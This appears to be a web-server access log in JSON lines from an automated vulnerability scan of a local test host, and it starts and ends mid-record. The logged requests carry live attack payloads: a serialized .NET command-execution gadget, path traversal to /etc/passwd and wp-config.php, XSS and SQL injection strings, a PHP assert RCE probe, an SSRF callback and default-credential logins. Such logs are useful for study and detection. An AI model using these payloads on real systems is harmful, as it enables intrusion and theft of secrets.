b2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/packages/security.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emergency.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"s=phpinfo()&_method=__construct&filter=assert","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?s=index/index/index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php?action=login&type=admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_ID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_FileUploadDir\x22\x0D\x0A\x0D\x0A/wp-content/uploads/simple-file-list/\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Timestamp\x22\x0D\x0A\x0D\x0A1587258885\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Token\x22\x0D\x0A\x0D\x0Aba288252629a5399759b6fde1e205bc2\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22nuclei.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\x22num\x22;s:72:\x220,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -\x22;s:2:\x22id\x22;i:1;}", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/config/1.0/directory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"html_element_selection=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json/v1.0/297MTxghyCpMuEtiDEP1W82vNf2@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/config/security.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test/test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx?pid=Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comm.php?id=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bzr/branch/branch.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"{\x22id\x22: 1, \x22method\x22: \x22global.login\x22, \x22params\x22: {\x22authorityType\x22: \x22Default\x22, \x22clientType\x22: \x22NetKeyboard\x22, \x22loginType\x22: \x22Direct\x22, \x22password\x22: \x22Not Used\x22, \x22passwordType\x22: \x22Default\x22, \x22userName\x22: \x22admin\x22}, \x22session\x22: 0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2_Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-member/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /thruk/cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"127.0.0.1/thruk/cgi-bin/login.cgi?thruk", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"https://example.com", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/dbstat/gettablessize HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 